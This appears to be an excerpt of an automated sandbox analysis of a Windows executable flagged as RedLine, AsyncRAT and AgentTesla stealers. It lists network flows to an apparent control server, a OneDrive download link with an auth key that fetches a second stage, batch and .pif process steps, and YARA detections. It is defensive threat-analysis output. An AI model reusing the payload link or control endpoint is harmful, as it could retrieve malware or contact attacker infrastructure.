                                                                                                  Jan 23, 2024 14:33:15.635412931 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:15.677902937 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:15.978279114 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.028836966 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:16.124569893 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.124670982 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.124825954 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:16.125608921 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:16.125655890 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.125689983 CET49718443192.168.2.5150.171.43.11
                                                                                                  Jan 23, 2024 14:33:16.125705004 CET44349718150.171.43.11192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.379718065 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.400671005 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:16.796044111 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:16.796142101 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:17.201555014 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:29.111135006 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:29.514475107 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:29.514681101 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:29.869595051 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:29.916277885 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:30.267419100 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:30.298161983 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:30.701654911 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:30.701821089 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:31.107803106 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:42.226964951 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:42.275568962 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:42.626286983 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:42.681930065 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:43.006639957 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:43.398540020 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:43.398643970 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:43.753457069 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:43.806849003 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:44.157635927 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:44.185122013 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:44.576575041 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:44.576659918 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:44.967469931 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:57.640252113 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:58.046679974 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:58.046807051 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:58.402472019 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:58.447707891 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:58.798873901 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:58.813273907 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:59.218770981 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:33:59.219008923 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:33:59.624994993 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:11.549638033 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:11.941252947 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:11.941505909 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:12.240022898 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:12.291301966 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:12.292690039 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:12.338073969 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:12.642455101 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:12.668297052 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:13.060538054 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:13.060745955 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:13.452528954 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:25.445313931 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:25.837235928 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:25.837452888 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:26.193250895 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:26.244431973 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:26.595628023 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:26.612386942 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:27.003207922 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:27.003319979 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:27.395142078 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:39.338130951 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:39.729820967 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:39.730010033 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:40.086463928 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:40.134887934 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:40.485920906 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:40.507489920 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:40.898765087 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:40.899106026 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:41.290958881 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:42.231312990 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:42.275587082 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:42.626985073 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:42.681746960 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:53.242469072 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:53.633554935 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:53.634038925 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:53.989291906 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:54.041177988 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:54.392050982 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:54.406996012 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:54.797605991 CET201749707139.84.229.159192.168.2.5
                                                                                                  Jan 23, 2024 14:34:54.797676086 CET497072017192.168.2.5139.84.229.159
                                                                                                  Jan 23, 2024 14:34:55.189600945 CET201749707139.84.229.159192.168.2.5
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 23, 2024 14:32:50.404597998 CET5997653192.168.2.51.1.1.1
                                                                                                  Jan 23, 2024 14:32:51.391314983 CET5072553192.168.2.51.1.1.1
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 23, 2024 14:32:50.404597998 CET192.168.2.51.1.1.10x935Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:51.391314983 CET192.168.2.51.1.1.10x3abeStandard query (0)ypeqqw.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 23, 2024 14:32:50.523600101 CET1.1.1.1192.168.2.50x935No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:50.523600101 CET1.1.1.1192.168.2.50x935No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:50.523600101 CET1.1.1.1192.168.2.50x935No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:50.523600101 CET1.1.1.1192.168.2.50x935No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:50.523600101 CET1.1.1.1192.168.2.50x935No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:51.567450047 CET1.1.1.1192.168.2.50x3abeNo error (0)ypeqqw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 23, 2024 14:32:51.567450047 CET1.1.1.1192.168.2.50x3abeNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  • onedrive.live.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549705150.171.43.114434332C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-01-23 13:32:51 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Accept: */*
                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                  Host: onedrive.live.com
                                                                                                  2024-01-23 13:32:51 UTC1179INHTTP/1.1 302 Found
                                                                                                  Cache-Control: no-cache, no-store
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/html
                                                                                                  Expires: -1
                                                                                                  Location: https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWBF4-M6t_l3vuys7QE6-LgWc_qZsOSFTN4AxF1Q83vgAUNndNPKDxiwx8a2HptjaOZrVDURPeua8_ttBDBXCBLWsQt5H-jrqRzx5Bt5ytvRis6QssSXvvF0eaiF9Eyd-gkfo3RknEMufGy_S9tgRwDow/255_Akaelkovaac?download&psid=1
                                                                                                  Set-Cookie: E=P:75f1yxcc3Ig=:Lwl8fwbiYjxcVe/PSAhzySyyeTMfFqQN3lq0gmdPnqw=:F; domain=.live.com; path=/
                                                                                                  Set-Cookie: xid=dbd0ddf4-8e19-4198-b190-1b54163411bc&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/
                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:52:51 GMT; path=/
                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:32:51 GMT; path=/
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  X-MSNServer: fb9f7fbfd-hhkpl
                                                                                                  X-ODWebServer: nameastus2300077-odwebpl
                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                  X-MSEdge-Ref: Ref A: DC732813CF624D2388DD18985E78E7AD Ref B: BL2AA2030102009 Ref C: 2024-01-23T13:32:51Z
                                                                                                  Date: Tue, 23 Jan 2024 13:32:50 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549710150.171.43.114432504C:\Users\Public\Libraries\Akaelkov.PIF
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-01-23 13:33:07 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Accept: */*
                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                  Host: onedrive.live.com
                                                                                                  2024-01-23 13:33:07 UTC1179INHTTP/1.1 302 Found
                                                                                                  Cache-Control: no-cache, no-store
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/html
                                                                                                  Expires: -1
                                                                                                  Location: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8oWpvASIUp_-vfmq1PGnBx2Oe-zBM5U2YgVgnct2DB3pE8D8E9cRixzHDH_Jmdr7ncJSvifPNPQmMw9zb3pUtTBAN83xFgn3puoyaRYUtDEgRHhMlKO5cl0pf-WKk3su0yEFCGBO438bp3YLWp12-jg/255_Akaelkovaac?download&psid=1
                                                                                                  Set-Cookie: E=P:iw6U1Rcc3Ig=:BeGHBie4nXCamnvKZjkpHPaIgNhsZv3pR2qNmCAgJ6E=:F; domain=.live.com; path=/
                                                                                                  Set-Cookie: xid=03d6df96-e526-435b-9d32-ca153fd960fc&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/
                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:53:07 GMT; path=/
                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:33:07 GMT; path=/
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  X-MSNServer: fb9f7fbfd-fjm44
                                                                                                  X-ODWebServer: nameastus2300077-odwebpl
                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                  X-MSEdge-Ref: Ref A: 05D6A42285824EB7AC5E07D0FF068D6C Ref B: BL2AA2030104053 Ref C: 2024-01-23T13:33:07Z
                                                                                                  Date: Tue, 23 Jan 2024 13:33:07 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549718150.171.43.114435616C:\Users\Public\Libraries\Akaelkov.PIF
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-01-23 13:33:15 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Accept: */*
                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                  Host: onedrive.live.com
                                                                                                  2024-01-23 13:33:16 UTC1179INHTTP/1.1 302 Found
                                                                                                  Cache-Control: no-cache, no-store
                                                                                                  Pragma: no-cache
                                                                                                  Content-Type: text/html
                                                                                                  Expires: -1
                                                                                                  Location: https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQA4eEIatRf2a7myXWxPq1oU2UYPzV1UaSQLPTA6u9xIRuqsnjTh-ZV_5zKvE0hHsMluesriyZa26a9_7sPuplCh1eeudYE5VSG0ZTdGuOxubhxpuPd4IgvjaklBpDzVu60XTr2o7rdOCqFBr1UwfsIEQ/255_Akaelkovaac?download&psid=1
                                                                                                  Set-Cookie: E=P:Q7Sb2hcc3Ig=:OBmzBcH+2RwtDbZ60RbP5PuJMyPDcZ9VPxclBJIiR8c=:F; domain=.live.com; path=/
                                                                                                  Set-Cookie: xid=f8b1bea6-0331-4094-a88a-73cafa1b1711&&ODSP-ODWEB-ODCF&55; domain=.live.com; path=/
                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jan-2024 11:53:15 GMT; path=/
                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jan-2024 13:33:16 GMT; path=/
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  X-MSNServer: bfc56449b-c5s9n
                                                                                                  X-ODWebServer: nameastus9685829-odwebpl
                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                  X-MSEdge-Ref: Ref A: 3D4981DF614B4E7E9B51972CAD2DCEE6 Ref B: BL2AA2030104031 Ref C: 2024-01-23T13:33:15Z
                                                                                                  Date: Tue, 23 Jan 2024 13:33:15 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 0


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:14:32:48
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\PCMNil7wkU.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'743'360 bytes
                                                                                                  MD5 hash:344C9C0F72C535E334A4B605212C69D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.2001613142.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2024259501.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:14:32:53
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" "
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:14:32:53
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:14:32:53
                                                                                                  Start date:23/01/2024
                                                                                                  Path:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\vokleakA.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.0000000000450000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000001.2001615999.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.0000000000450000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.3207967153.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
